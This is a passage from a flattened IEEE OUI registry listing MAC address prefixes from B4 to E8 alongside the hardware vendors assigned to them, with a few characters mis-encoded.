Co.,LTD B4-D8-A9 (hex) BetterBots B4-D8-DE (hex) iota Computing, Inc. B4-E0-CD (hex) IO Turbine, Inc. B4-ED-19 (hex) Pie Digital, Inc. B4-ED-54 (hex) Wohler Technologies B4-EE-D4 (hex) Texas Instruments B4-F3-23 (hex) PETATEL INC. B4-FC-75 (hex) SEMA Electronics(HK) CO.,LTD B8-03-05 (hex) Intel Corporate B8-0B-9D (hex) ROPEX Industrie-Elektronik GmbH B8-14-13 (hex) Keen High Holding(HK) Ltd. B8-17-C2 (hex) Apple, Inc. B8-19-99 (hex) Nesys B8-20-E7 (hex) Guangzhou Horizontal Information & Network Integration Co. Ltd B8-26-D4 (hex) Furukawa Industrial S.A. Produtos Elétricos B8-28-8B (hex) Parker Hannifin B8-2A-DC (hex) EFR Europäische Funk-Rundsteuerung GmbH B8-2C-A0 (hex) Honeywell HomMed B8-3A-7B (hex) Worldplay (Canada) Inc. B8-3D-4E (hex) Shenzhen Cultraview Digital Technology Co.,Ltd Shanghai Branch B8-41-5F (hex) ASP AG B8-61-6F (hex) Accton Wireless Broadband(AWB), Corp. B8-62-1F (hex) Cisco Systems B8-64-91 (hex) CK Telecom Ltd B8-65-3B (hex) Bolymin, Inc. B8-70-F4 (hex) COMPAL INFORMATION (KUNSHAN) CO., LTD. B8-74-24 (hex) Viessmann Elektronik GmbH B8-74-47 (hex) Convergence Technologies B8-79-7E (hex) Secure Meters (UK) Limited B8-87-1E (hex) Good Mind Industries Co., Ltd. B8-88-E3 (hex) COMPAL INFORMATION (KUNSHAN) CO., LTD B8-8D-12 (hex) Apple, Inc. B8-8E-3A (hex) Infinite Technologies JLT B8-92-1D (hex) BG T&A B8-94-D2 (hex) Retail Innovation HTT AB B8-96-74 (hex) AllDSP GmbH & Co. KG B8-97-5A (hex) BIOSTAR Microtech Int'l Corp. B8-9A-ED (hex) OceanServer Technology, Inc B8-9B-C9 (hex) SMC Networks Inc B8-A3-86 (hex) D-Link International B8-A3-E0 (hex) BenRui Technology Co.,Ltd B8-A8-AF (hex) Logic S.p.A. B8-AC-6F (hex) Dell Inc B8-AF-67 (hex) Hewlett-Packard Company B8-B1-C7 (hex) BT&COM CO.,LTD B8-B4-2E (hex) Gionee Communication Equipment Co,Ltd.ShenZhen B8-BA-68 (hex) Xi'an Jizhong Digital Communication Co.,Ltd B8-BA-72 (hex) Cynove B8-BB-6D (hex) ENERES Co.,Ltd. B8-BE-BF (hex) Cisco Systems B8-C7-16 (hex) Fiberhome Telecommunication Technologies Co.,LTD B8-C7-5D (hex) Apple Inc B8-CD-A7 (hex) Maxeler Technologies Ltd. B8-D0-6F (hex) GUANGZHOU HKUST FOK YING TUNG RESEARCH INSTITUTE B8-D4-9D (hex) M Seven System Ltd. B8-DA-F7 (hex) Advanced Photonics, Inc. B8-E5-89 (hex) Payter BV B8-E6-25 (hex) 2Wire B8-E7-79 (hex) 9Solutions Oy B8-EE-79 (hex) YWire Technologies, Inc. B8-F4-D0 (hex) Herrmann Ultraschalltechnik GmbH & Co. Kg B8-F5-E7 (hex) WayTools, LLC B8-F7-32 (hex) Aryaka Networks Inc B8-F9-34 (hex) Sony Ericsson Mobile Communications AB B8-FD-32 (hex) Zhejiang ROICX Microelectronics B8-FF-61 (hex) Apple B8-FF-6F (hex) Shanghai Typrotech Technology Co.Ltd B8-FF-FE (hex) Texas Instruments BC-05-43 (hex) AVM GmbH BC-0D-A5 (hex) Texas Instruments BC-0F-2B (hex) FORTUNE TECHGROUP CO.,LTD BC-12-5E (hex) Beijing WisVideo INC. BC-15-A6 (hex) Taiwan Jantek Electronics,Ltd. BC-20-BA (hex) Inspur (Shandong) Electronic Information Co., Ltd BC-28-46 (hex) NextBIT Computing Pvt. Ltd. BC-30-5B (hex) Dell Inc. BC-35-E5 (hex) Hydro Systems Company BC-38-D2 (hex) Pandachip Limited BC-3E-13 (hex) Accordance Systems Inc. BC-43-77 (hex) Hang Zhou Huite Technology Co.,ltd. BC-47-60 (hex) Samsung Electronics Co.,Ltd BC-4B-79 (hex) SensingTek BC-4E-3C (hex) CORE STAFF CO., LTD. BC-5F-F4 (hex) ASRock Incorporation BC-67-84 (hex) Environics Oy BC-6A-16 (hex) tdvine BC-6E-76 (hex) Green Energy Options Ltd BC-71-C1 (hex) XTrillion, Inc. BC-76-4E (hex) Rackspace US, Inc. BC-76-70 (hex) Huawei Device Co., Ltd BC-77-37 (hex) Intel Corporate BC-77-9F (hex) SBM Co., Ltd. BC-7D-D1 (hex) Radio Data Comms BC-81-99 (hex) BASIC Co.,Ltd. BC-83-A7 (hex) SHENZHEN CHUANGWEI-RGB ELECTRONICS CO.,LT BC-99-BC (hex) FonSee Technology Inc. BC-9D-A5 (hex) DASCOM Europe GmbH BC-A4-E1 (hex) Nabto BC-A9-D6 (hex) Cyber-Rain, Inc. BC-AE-C5 (hex) ASUSTek COMPUTER INC. BC-B1-81 (hex) SHARP CORPORATION BC-B1-F3 (hex) Samsung Electronics BC-B8-52 (hex) Cybera, Inc. BC-BB-C9 (hex) Kellendonk Elektronik GmbH BC-C6-1A (hex) SPECTRA EMBEDDED SYSTEMS BC-CD-45 (hex) VOISMART BC-D5-B6 (hex) d2d technologies BC-E0-9D (hex) Eoslink BC-E5-9F (hex) WATERWORLD Technology Co.,LTD BC-F2-AF (hex) devolo AG BC-FE-8C (hex) Altronic, LLC BC-FF-AC (hex) TOPCON CORPORATION C0-0D-7E (hex) Additech, Inc. C0-12-42 (hex) Alpha Security Products C0-1E-9B (hex) Pixavi AS C0-22-50 (hex) PRIVATE C0-25-06 (hex) AVM GmbH C0-27-B9 (hex) Beijing National Railway Research & Design Institute of Signal & Communication C0-29-73 (hex) Audyssey Laboratories Inc. C0-29-F3 (hex) XySystem C0-2B-FC (hex) iNES. applied informatics GmbH C0-38-F9 (hex) Nokia Danmark A/S C0-3B-8F (hex) Minicom Digital Signage C0-3F-0E (hex) NETGEAR C0-58-A7 (hex) Pico Systems Co., Ltd. C0-62-6B (hex) Cisco Systems C0-6C-0F (hex) Dobbs Stanford C0-7E-40 (hex) SHENZHEN XDK COMMUNICATION EQUIPMENT CO.,LTD C0-83-0A (hex) 2Wire C0-8B-6F (hex) S I Sistemas Inteligentes Eletronicos Ltda C0-91-32 (hex) Patriot Memory C0-91-34 (hex) ProCurve Networking by HP C0-9C-92 (hex) COBY C0-A0-DE (hex) Multi Touch Oy C0-A2-6D (hex) Abbott Point of Care C0-AC-54 (hex) SAGEMCOM C0-BA-E6 (hex) Application Solutions (Safety and Security) Ltd C0-C1-C0 (hex) Cisco-Linksys, LLC C0-C5-20 (hex) Ruckus Wireless C0-CB-38 (hex) Hon Hai Precision Ind. Co.,Ltd. C0-CF-A3 (hex) Creative Electronics & Software, Inc. C0-D0-44 (hex) SAGEMCOM C0-D9-62 (hex) Askey Computer Corp. C0-DF-77 (hex) Conrad Electronic SE C0-E4-22 (hex) Texas Instruments C0-E5-4E (hex) DENX Computer Systems GmbH C0-EA-E4 (hex) Sonicwall C0-F8-DA (hex) Hon Hai Precision Ind. Co.,Ltd. C4-01-42 (hex) MaxMedia Technology Limited C4-0A-CB (hex) Cisco Systems C4-0F-09 (hex) Hermes electronic GmbH C4-10-8A (hex) Ruckus Wireless C4-16-FA (hex) Prysm Inc C4-17-FE (hex) Hon Hai Precision Ind. Co.,Ltd. C4-19-8B (hex) Dominion Voting Systems Corporation C4-1E-CE (hex) HMI Sources Ltd. C4-23-7A (hex) WhizNets Inc. C4-24-2E (hex) Galvanic Applied Sciences Inc C4-2C-03 (hex) Apple C4-36-DA (hex) Rusteletech Ltd. C4-3A-9F (hex) Siconix Inc. C4-3C-3C (hex) CYBELEC SA C4-3D-C7 (hex) NETGEAR C4-46-19 (hex) Hon Hai Precision Ind. Co.,Ltd. C4-4A-D0 (hex) FIREFLIES RTLS C4-4B-44 (hex) Omniprint Inc. C4-55-A6 (hex) Cadac Holdings Ltd C4-56-00 (hex) Galleon Embedded Computing C4-59-76 (hex) Fugoo C4-60-44 (hex) Everex Electronics Limited C4-63-54 (hex) U-Raku, Inc. C4-64-13 (hex) Cisco Systems C4-67-B5 (hex) Libratone A/S C4-71-FE (hex) Cisco Systems C4-7B-2F (hex) Beijing JoinHope Image Technology Ltd. C4-7D-4F (hex) Cisco Systems C4-82-3F (hex) Fujian Newland Auto-ID Tech. Co,.Ltd. C4-85-08 (hex) Intel Corporation C4-93-00 (hex) 8Devices C4-93-13 (hex) 100fio networks technology llc C4-AA-A1 (hex) SUMMIT DEVELOPMENT, spol.s r.o. C4-B5-12 (hex) General Electric Digital Energy C4-C1-9F (hex) National Oilwell Varco Instrumentation, Monitoring, and Optimization (NOV IMO) C4-CA-D9 (hex) Hangzhou H3C Technologies Co., Limited C4-CD-45 (hex) Beijing Boomsense Technology CO.,LTD. C4-D4-89 (hex) JiangSu Joyque Information Industry Co.,Ltd C4-E1-7C (hex) U2S co. C4-EE-AE (hex) VSS Monitoring C4-EE-F5 (hex) Oclaro, Inc. C4-F4-64 (hex) Spica international C4-FC-E4 (hex) DishTV NZ Ltd C8-02-A6 (hex) Beijing Newmine Technology C8-07-18 (hex) TDSi C8-0A-A9 (hex) Quanta Computer Inc. C8-1A-FE (hex) DLOGIC GmbH C8-1E-8E (hex) ADV Security (S) Pte Ltd C8-20-8E (hex) Storagedata C8-29-2A (hex) Barun Electronics C8-2A-14 (hex) Apple Inc C8-2E-94 (hex) Halfa Enterprise Co., Ltd. C8-32-32 (hex) Hunting Innova C8-35-B8 (hex) Ericsson, EAB/RWI/K C8-3A-35 (hex) Tenda Technology Co., Ltd. C8-3B-45 (hex) JRI-Maxant C8-3E-99 (hex) Texas Instruments C8-3E-A7 (hex) KUNBUS GmbH C8-45-29 (hex) IMK Networks Co.,Ltd C8-48-F5 (hex) MEDISON Xray Co., Ltd C8-4C-75 (hex) Cisco Systems C8-60-00 (hex) ASUSTek COMPUTER INC. C8-64-C7 (hex) zte corporation C8-6C-1E (hex) Display Systems Ltd C8-6C-87 (hex) Zyxel Communications Corp C8-6C-B6 (hex) Optcom Co., Ltd. C8-72-48 (hex) Aplicom Oy C8-7B-5B (hex) zte corporation C8-7C-BC (hex) Valink Co., Ltd. C8-7D-77 (hex) Shenzhen Kingtech Communication Equipment Co.,Ltd C8-7E-75 (hex) Samsung Electronics Co.,Ltd C8-84-39 (hex) Sunrise Technologies C8-84-47 (hex) Beautiful Enterprise Co., Ltd C8-87-3B (hex) Net Optics C8-8B-47 (hex) Opticos s.r.l. C8-90-3E (hex) Pakton Technologies C8-93-83 (hex) Embedded Automation, Inc. C8-94-D2 (hex) Jiangsu Datang Electronic Products Co., Ltd C8-97-9F (hex) Nokia Corporation C8-9C-1D (hex) Cisco Systems C8-9C-DC (hex) ELITEGROUP COMPUTER SYSTEM CO., LTD. C8-A1-B6 (hex) Shenzhen Longway Technologies Co., Ltd C8-A1-BA (hex) Neul Ltd C8-A6-20 (hex) Nebula, Inc C8-A7-0A (hex) Verizon Business C8-A7-29 (hex) SYStronics Co., Ltd. C8-AA-21 (hex) Motorola Mobility, Inc. C8-AA-CC (hex) PRIVATE C8-AF-40 (hex) marco Systemanalyse und Entwicklung GmbH C8-BC-C8 (hex) Apple C8-C1-26 (hex) ZPM Industria e Comercio Ltda C8-C1-3C (hex) RuggedTek Hangzhou Co., Ltd C8-CD-72 (hex) SAGEMCOM C8-D1-5E (hex) Huawei Technologies Co., Ltd C8-D1-D1 (hex) AGAiT Technology Corporation C8-D2-C1 (hex) Jetlun (Shenzhen) Corporation C8-D5-FE (hex) Shenzhen Zowee Technology Co., Ltd C8-DF-7C (hex) Nokia Corporation C8-EE-08 (hex) TANGTOP TECHNOLOGY CO.,LTD C8-EF-2E (hex) Beijing Gefei Tech. Co., Ltd C8-F4-06 (hex) Avaya, Inc C8-F9-81 (hex) Seneca s.r.l. C8-FE-30 (hex) Bejing DAYO Mobile Communication Technology Ltd. CC-00-80 (hex) TRUST SYSTEM Co., CC-05-1B (hex) Samsung Electronics Co.,Ltd CC-08-E0 (hex) Apple CC-09-C8 (hex) IMAQLIQ LTD CC-0C-DA (hex) Miljovakt AS CC-1E-FF (hex) Metrological Group BV CC-22-18 (hex) InnoDigital Co., Ltd. CC-34-D7 (hex) GEWISS S.P.A. CC-43-E3 (hex) Trump s.a. CC-50-1C (hex) KVH Industries, Inc. CC-50-76 (hex) Ocom Communications, Inc. CC-52-AF (hex) Universal Global Scientific Industrial Co., Ltd. CC-54-59 (hex) OnTime Networks AS CC-55-AD (hex) RIM CC-5C-75 (hex) Weightech Com. Imp. Exp. Equip. Pesagem Ltda CC-5D-4E (hex) ZyXEL Communications Corporation CC-60-BB (hex) Empower RF Systems CC-69-B0 (hex) Global Traffic Technologies, LLC CC-6B-98 (hex) Minetec Wireless Technologies CC-6B-F1 (hex) Sound Masking Inc. CC-6D-A0 (hex) Roku, Inc. CC-6D-EF (hex) TJK Tietolaite Oy CC-76-69 (hex) SEETECH CC-7A-30 (hex) CMAX Wireless Co., Ltd. CC-7D-37 (hex) Motorola Mobility, Inc. CC-7E-E7 (hex) Panasonic AVC Networks Company CC-8C-E3 (hex) Texas Instruments CC-90-93 (hex) Hansong Tehnologies CC-94-4A (hex) Pfeiffer Vacuum GmbH CC-96-A0 (hex) Huawei Device Co., Ltd CC-9E-00 (hex) Nintendo Co., Ltd. CC-A3-74 (hex) Guangdong Guanglian Electronic Technology Co.Ltd CC-AF-78 (hex) Hon Hai Precision Ind. Co.,Ltd. CC-B5-5A (hex) Fraunhofer ITWM CC-B8-88 (hex) AnB Securite s.a. CC-B8-F1 (hex) EAGLE KINGDOM TECHNOLOGIES LIMITED CC-BE-71 (hex) OptiLogix BV CC-C6-2B (hex) Tri-Systems Corporation CC-C8-D7 (hex) CIAS Elettronica srl CC-CC-4E (hex) Sun Fountainhead USA. Corp CC-CD-64 (hex) SM-Electronic GmbH CC-CE-40 (hex) Janteq Corp CC-D8-11 (hex) Aiconn Technology Corporation CC-D9-E9 (hex) SCR Engineers Ltd. CC-E7-DF (hex) American Magnetics, Inc. CC-EA-1C (hex) DCONWORKS Co., Ltd CC-EF-48 (hex) Cisco Systems CC-F3-A5 (hex) Chi Mei Communication Systems, Inc CC-F6-7A (hex) Ayecka Communication Systems LTD CC-F8-41 (hex) Lumewave CC-F8-F0 (hex) Xi'an HISU Multimedia Technology Co.,Ltd. CC-F9-54 (hex) Avaya, Inc CC-F9-E8 (hex) Samsung Electronics Co.,Ltd CC-FC-6D (hex) RIZ TRANSMITTERS CC-FC-B1 (hex) Wireless Technology, Inc. D0-07-90 (hex) Texas Instruments D0-13-1E (hex) Sunrex Technology Corp D0-15-4A (hex) zte corporation D0-17-6A (hex) Samsung Electronics Co.,Ltd D0-1C-BB (hex) Beijing Ctimes Digital Technology Co., Ltd. D0-23-DB (hex) Apple, Inc. D0-27-88 (hex) Hon Hai Precision Ind.Co.Ltd D0-31-10 (hex) Ingenic Semiconductor Co.,Ltd D0-37-61 (hex) Texas Instruments D0-54-2D (hex) Cambridge Industries(Group) Co.,Ltd. D0-57-4C (hex) Cisco Systems D0-58-75 (hex) Active Control Technology Inc. D0-59-C3 (hex) CeraMicro Technology Corporation D0-5A-0F (hex) I-BT DIGITAL CO.,LTD D0-5F-CE (hex) Hitachi Data Systems D0-66-7B (hex) Samsung Electronics Co., LTD D0-67-E5 (hex) Dell Inc D0-75-BE (hex) Reno A&E D0-7D-E5 (hex) Forward Pay Systems, Inc. D0-89-99 (hex) APCON, Inc. D0-8C-B5 (hex) Texas Instruments D0-93-F8 (hex) Stonestreet One LLC D0-9B-05 (hex) Emtronix D0-A3-11 (hex) Neuberger Geb�udeautomation GmbH D0-AF-B6 (hex) Linktop Technology Co., LTD D0-B3-3F (hex) SHENZHEN TINNO MOBILE TECHNOLOGY CO.,LTD. D0-B5-3D (hex) SEPRO ROBOTIQUE D0-BB-80 (hex) SHL Telemedicine International Ltd. D0-C1-B1 (hex) Samsung Electronics Co.,Ltd D0-C2-82 (hex) Cisco Systems D0-CF-5E (hex) Energy Micro AS D0-D0-FD (hex) Cisco Systems D0-D2-86 (hex) Beckman Coulter Biomedical K.K. D0-D3-FC (hex) Mios, Ltd. D0-DF-9A (hex) Liteon Technology Corporation D0-DF-C7 (hex) Samsung Electronics Co.,Ltd D0-E3-47 (hex) Yoga D0-E4-0B (hex) Wearable Inc. D0-E5-4D (hex) Pace plc D0-EB-9E (hex) Seowoo Inc. D0-F0-DB (hex) Ericsson D4-00-0D (hex) Phoenix Broadband Technologies, LLC. D4-02-4A (hex) Delphian Systems LLC D4-11-D6 (hex) ShotSpotter, Inc. D4-12-96 (hex) Anobit Technologies Ltd. D4-12-BB (hex) Quadrant Components Inc. Ltd D4-1C-1C (hex) RCF S.P.A. D4-1F-0C (hex) TVI Vision Oy D4-20-6D (hex) HTC Corporation D4-28-B2 (hex) ioBridge, Inc. D4-2C-3D (hex) Sky Light Digital Limited D4-3A-E9 (hex) DONGGUAN ipt INDUSTRIAL CO., LTD D4-3D-67 (hex) Carma Industries Inc. D4-43-A8 (hex) Changzhou Haojie Electric Co., Ltd. D4-4B-5E (hex) TAIYO YUDEN CO., LTD. D4-4C-24 (hex) Vuppalamritha Magnetic Components LTD D4-4C-A7 (hex) Informtekhnika & Communication, LLC D4-4F-80 (hex) Kemper Digital GmbH D4-50-7A (hex) CEIVA Logic, Inc D4-52-51 (hex) IBT Ingenieurbureau Broennimann Thun D4-52-97 (hex) nSTREAMS Technologies, Inc. D4-53-AF (hex) VIGO System S.A. D4-5A-B2 (hex) Galleon Systems D4-5D-42 (hex) Nokia Corporation D4-66-A8 (hex) Riedo Networks GmbH D4-6C-BF (hex) Goodrich ISR D4-6C-DA (hex) CSM GmbH D4-6F-42 (hex) WAXESS USA Inc D4-79-C3 (hex) Cameronet GmbH & Co. KG D4-7B-75 (hex) HARTING Electronics GmbH & Co. KG D4-82-3E (hex) Argosy Technologies, Ltd. D4-85-64 (hex) Hewlett-Packard Company D4-88-90 (hex) Samsung Electronics Co.,Ltd D4-8F-AA (hex) Sogecam Industrial, S.A. D4-91-AF (hex) Electroacustica General Iberica, S.A. D4-94-5A (hex) COSMO CO., LTD D4-94-A1 (hex) Texas Instruments D4-96-DF (hex) SUNGJIN C&T CO.,LTD D4-9A-20 (hex) Apple, Inc D4-9C-28 (hex) JayBird Gear LLC D4-9C-8E (hex) University of FUKUI D4-9E-6D (hex) Wuhan Zhongyuan Huadian Science & Technology Co., D4-A0-2A (hex) Cisco Systems D4-A4-25 (hex) SMAX Technology Co., Ltd. D4-A9-28 (hex) GreenWave Reality Inc D4-AA-FF (hex) MICRO WORLD D4-AE-52 (hex) Dell Inc D4-BE-D9 (hex) Dell Inc D4-C1-FC (hex) Nokia Corporation D4-C7-66 (hex) Acentic GmbH D4-CA-6D (hex) Routerboard.com D4-CB-AF (hex) Nokia Corporation D4-CE-B8 (hex) Enatel LTD D4-D1-84 (hex) ADB Broadband Italia D4-D2-49 (hex) Power Ethernet D4-D7-48 (hex) Cisco Systems D4-D8-98 (hex) Korea CNO Tech Co., Ltd D4-E3-2C (hex) S. Siedle & Sohne D4-E3-3F (hex) Alcatel-Lucent D4-E8-B2 (hex) Samsung Electronics D4-F0-27 (hex) Navetas Energy Management D4-F0-B4 (hex) Napco Security Technologies D4-F1-43 (hex) IPROAD.,Inc D4-F6-3F (hex) IEA S.R.L. D8-05-2E (hex) Skyviia Corporation D8-1B-FE (hex) TWINLINX CORPORATION D8-1C-14 (hex) Compacta International, Ltd. D8-24-BD (hex) Cisco Systems D8-26-B9 (hex) Guangdong Coagent Electronics S &T Co., Ltd. D8-28-C9 (hex) General Electric Consumer and Industrial D8-29-86 (hex) Best Wish Technology LTD D8-2A-7E (hex) Nokia Corporation D8-30-62 (hex) Apple, Inc D8-42-AC (hex) FreeComm Data Communication Co.,Ltd. D8-46-06 (hex) Silicon Valley Global Marketing D8-4B-2A (hex) Cognitas Technologies, Inc. D8-54-3A (hex) Texas Instruments D8-5D-4C (hex) TP-LINK Technologies Co.,Ltd. D8-5D-84 (hex) CAx soft GmbH D8-6B-F7 (hex) Nintendo Co., Ltd. D8-71-57 (hex) Lenovo Mobile Communication Technology Ltd. D8-75-33 (hex) Nokia Corporation D8-76-0A (hex) Escort, Inc. D8-78-E5 (hex) KUHN SA D8-79-88 (hex) Hon Hai Precision Ind. Co., Ltd. D8-95-2F (hex) Texas Instruments D8-96-85 (hex) GoPro D8-97-3B (hex) Emerson Network Power Embedded Power D8-97-60 (hex) C2 Development, Inc. D8-9D-B9 (hex) eMegatech International Corp. D8-9E-3F (hex) Apple, Inc. D8-A2-5E (hex) Apple D8-AE-90 (hex) Itibia Technologies D8-B1-2A (hex) Panasonic Mobile Communications Co., Ltd. D8-B3-77 (hex) HTC Corporation D8-B6-C1 (hex) NetworkAccountant, Inc. D8-B9-0E (hex) Triple Domain Vision Co.,Ltd. D8-C0-68 (hex) Netgenetech.co.,ltd. D8-C3-FB (hex) DETRACOM D8-C7-C8 (hex) Aruba Networks D8-C9-9D (hex) EA DISPLAY LIMITED D8-D3-85 (hex) Hewlett-Packard Company D8-D6-7E (hex) GSK CNC EQUIPMENT CO.,LTD D8-DF-0D (hex) beroNet GmbH D8-E3-AE (hex) CIRTEC MEDICAL SYSTEMS D8-E7-2B (hex) OnPATH Technologies D8-E7-43 (hex) Rick TECHNOLOGY INC D8-F0-F2 (hex) Zeebo Inc D8-FE-8F (hex) IDFone Co., Ltd. DC-02-65 (hex) Meditech Kft DC-05-ED (hex) Nabtesco Corporation DC-07-C1 (hex) HangZhou QiYang Technology Co.,Ltd. DC-0B-1A (hex) ADB Broadband SpA DC-0E-A1 (hex) COMPAL INFORMATION (KUNSHAN) CO., LTD DC-16-A2 (hex) Medtronic Diabetes DC-17-5A (hex) Hitachi High-Technologies Corporation DC-1D-9F (hex) U & B tech DC-1E-A3 (hex) Accensus LLC DC-20-08 (hex) ASD Electronics Ltd DC-2B-61 (hex) Apple DC-2B-66 (hex) Infoblock DC-2C-26 (hex) Iton Technology Limited DC-2E-6A (hex) HCT. Co., Ltd. DC-33-50 (hex) TechSAT GmbH DC-3C-2E (hex) Manufacturing System Insights, Inc. DC-3C-84 (hex) Ticom Geomatics, Inc. DC-3E-51 (hex) Solberg & Andersen AS DC-49-C9 (hex) CASCO SIGNAL LTD DC-4E-DE (hex) SHINYEI TECHNOLOGY CO., LTD. DC-7B-94 (hex) Cisco Systems DC-9B-1E (hex) Intercom, Inc. DC-9C-52 (hex) Sapphire Technology Limited. DC-9F-DB (hex) Ubiquiti Networks, Inc. DC-A6-BD (hex) Beijing Lanbo Technology Co., Ltd. DC-A7-D9 (hex) Compressor Controls Corp DC-A8-CF (hex) New Spin Golf, LLC. DC-A9-71 (hex) Intel Corporate DC-B4-C4 (hex) Microsoft XCG DC-C1-01 (hex) SOLiD Technologies, Inc. DC-CB-A8 (hex) Explora Technologies Inc DC-CE-41 (hex) FE GLOBAL HONG KONG LIMITED DC-CF-94 (hex) Beijing Rongcheng Hutong Technology Co., Ltd. DC-D0-F7 (hex) Bentek Systems Ltd. DC-D3-21 (hex) HUMAX co.,tld DC-D8-7F (hex) Shenzhen JoinCyber Telecom Equipment Ltd DC-DE-CA (hex) Akyllor DC-E2-AC (hex) Lumens Digital Optics Inc. DC-E7-1C (hex) AUG Elektronik GmbH DC-F0-5D (hex) Letta Teknoloji DC-F8-58 (hex) Lorent Networks£¬ Inc. DC-FA-D5 (hex) STRONG Ges.m.b.H. E0-05-C5 (hex) TP-LINK Technologies Co.,Ltd. E0-0B-28 (hex) Inovonics E0-0C-7F (hex) Nintendo Co., Ltd. E0-14-3E (hex) Modoosis Inc. E0-1C-EE (hex) Bravo Tech, Inc. E0-1E-07 (hex) Anite Telecoms US. Inc E0-1F-0A (hex) Xslent Energy Technologies. LLC E0-24-7F (hex) HUAWEI TECHNOLOGIES CO.,LTD E0-25-38 (hex) Titan Pet Products E0-26-30 (hex) Intrigue Technologies, Inc. E0-26-36 (hex) Nortel Networks E0-27-1A (hex) TTC Next-generation Home Network System WG E0-2A-82 (hex) Universal Global Scientific Industrial Co., Ltd. E0-39-D7 (hex) Plexxi, Inc. E0-3C-5B (hex) SHENZHEN JIAXINJIE ELECTRON CO.,LTD E0-3E-7D (hex) data-complex GmbH E0-46-9A (hex) NETGEAR E0-58-9E (hex) Laerdal Medical E0-5B-70 (hex) Innovid, Co., Ltd. E0-5F-B9 (hex) Cisco Systems E0-61-B2 (hex) HANGZHOU ZENOINTEL TECHNOLOGY CO., LTD E0-62-90 (hex) Jinan Jovision Science & Technology Co., Ltd. E0-64-BB (hex) DigiView S.r.l. E0-69-95 (hex) PEGATRON CORPORATION E0-87-B1 (hex) Nata-Info Ltd. E0-8A-7E (hex) Exponent E0-8F-EC (hex) REPOTEC CO., LTD. E0-91-53 (hex) XAVi Technologies Corp. E0-91-F5 (hex) NETGEAR E0-94-67 (hex) Intel Corporate E0-95-79 (hex) ORTHOsoft inc, d/b/a Zimmer CAS E0-A1-D7 (hex) SFR E0-A6-70 (hex) Nokia Corporation E0-AB-FE (hex) Orb Networks, Inc. E0-AE-5E (hex) ALPS Electric Co,. Ltd. E0-B9-A5 (hex) Azurewave E0-B9-BA (hex) Apple, Inc. E0-BC-43 (hex) C2 Microsystems, Inc. E0-C2-86 (hex) Aisai Communication Technology Co., Ltd. E0-C9-22 (hex) Jireh Energy Tech., Ltd. E0-CA-4D (hex) Shenzhen Unistar Communication Co.,LTD E0-CA-94 (hex) Askey Computer E0-CB-4E (hex) ASUSTek COMPUTER INC. E0-CF-2D (hex) Gemintek Corporation E0-D1-0A (hex) Katoudenkikougyousyo co ltd E0-D7-BA (hex) Texas Instruments E0-DA-DC (hex) JVC KENWOOD Corporation E0-E7-51 (hex) Nintendo Co., Ltd. E0-E8-E8 (hex) Olive Telecommunication Pvt. Ltd E0-ED-1A (hex) vastriver Technology Co., Ltd E0-EE-1B (hex) Panasonic Automotive Systems Company of America E0-F2-11 (hex) Digitalwatt E0-F3-79 (hex) Vaddio E0-F8-47 (hex) Apple Inc E4-11-5B (hex) Hewlett Packard E4-12-89 (hex) topsystem Systemhaus GmbH E4-1C-4B (hex) V2 TECHNOLOGY, INC. E4-1F-13 (hex) IBM Corp E4-27-71 (hex) Smartlabs E4-2A-D3 (hex) Magneti Marelli S.p.A. Powertrain E4-2C-56 (hex) Lilee Systems, Ltd. E4-2F-F6 (hex) Unicore communication Inc. E4-35-93 (hex) Hangzhou GoTo technology Co.Ltd E4-35-FB (hex) Sabre Technology (Hull) Ltd E4-37-D7 (hex) HENRI DEPAEPE S.A.S. E4-41-E6 (hex) Ottec Technology GmbH E4-46-BD (hex) C&C TECHNIC TAIWAN CO., LTD. E4-48-C7 (hex) Cisco SPVTG E4-4E-18 (hex) Gardasoft VisionLimited E4-4F-29 (hex) MA Lighting Technology GmbH E4-55-EA (hex) Dedicated Computing E4-64-49 (hex) Motorola Mobility, Inc. E4-67-BA (hex) Danish Interpretation Systems A/S E4-6C-21 (hex) messMa GmbH E4-75-1E (hex) Getinge Sterilization AB E4-7C-F9 (hex) Samsung Electronics Co., LTD E4-83-99 (hex) Motorola Mobility, Inc. E4-8A-D5 (hex) RF WINDOW CO., LTD. E4-97-F0 (hex) Shanghai VLC Technologies Ltd. Co. E4-A5-EF (hex) TRON LINK ELECTRONICS CO., LTD. E4-AB-46 (hex) UAB Selteka E4-AD-7D (hex) SCL Elements E4-AF-A1 (hex) HES-SO E4-B0-21 (hex) Samsung Electronics Co.,Ltd E4-CE-8F (hex) Apple Inc E4-D5-3D (hex) Hon Hai Precision Ind. Co.,Ltd. E4-D7-1D (hex) Oraya Therapeutics E4-DD-79 (hex) En-Vision America, Inc. E4-E0-C5 (hex) Samsung Electronics Co., LTD E4-EC-10 (hex) Nokia Corporation E4-FA-1D (hex) PAD Peripheral Advanced Design Inc. E4-FF-DD (hex) ELECTRON INDIA E8-03-9A (hex) Samsung Electronics Co.,LTD E8-04-0B (hex) Apple Inc E8-04-62 (hex) Cisco Systems E8-05-6D (hex) Nortel Networks E8-06-88 (hex) Apple Inc. E8-0B-13 (hex) Akib Systems Taiwan, INC E8-0C-38 (hex) DAEYOUNG INFORMATION SYSTEM CO., LTD E8-11-32 (hex) Samsung Electronics Co.,LTD E8-28-77 (hex) TMY Co., Ltd. E8-28-D5 (hex) Cots Technology E8-39-35 (hex) Hewlett Packard E8-39-DF (hex) Askey Computer E8-3A-97 (hex) OCZ Technology Group E8-3E-B6 (hex) RIM E8-40-40 (hex) Cisco Systems E8-43-B6 (hex) QNAP Systems, Inc. E8-4E-06 (hex) EDUP INTERNATIONAL (HK) CO., LTD E8-4E-CE (hex) Nintendo Co., Ltd. E8-5B-5B (hex) LG ELECTRONICS INC E8-5E-53 (hex) Infratec Datentechnik GmbH E8-6C-DA (hex) Supercomputers and Neurocomputers Research Center Taganrog Rostov-on-Don region 347922 E8-6D-52 (hex) Motorola Mobility, Inc. E8-75-7F (hex) FIRS Technologies(Shenzhen) Co., Ltd E8-78-A1 (hex) BEOVIEW INTERCOM DOO E8-7A-F3 (hex) S5 Tech S.r.l. E8-94-4C (hex) Cogent Healthcare Systems Ltd E8-99-5A (hex) PiiGAB, Processinformation i Goteborg AB E8-9A-8F (hex) Quanta Computer Inc. E8-9D-87 (hex) Toshiba E8-A4-C1 (hex) Deep Sea Electronics PLC E8-B4-AE (hex) Shenzhen C&D Electronics Co.,Ltd E8-B7-48 (hex) Cisco Systems E8-BA-70 (hex) Cisco Systems E8-BE-81 (hex) SAGEMCOM E8-C2-29 (hex) H-Displays (MSC) Bhd E8-C3-20 (hex) Austco Communication Systems Pty Ltd E8-CC-32 (hex) Micronet LTD 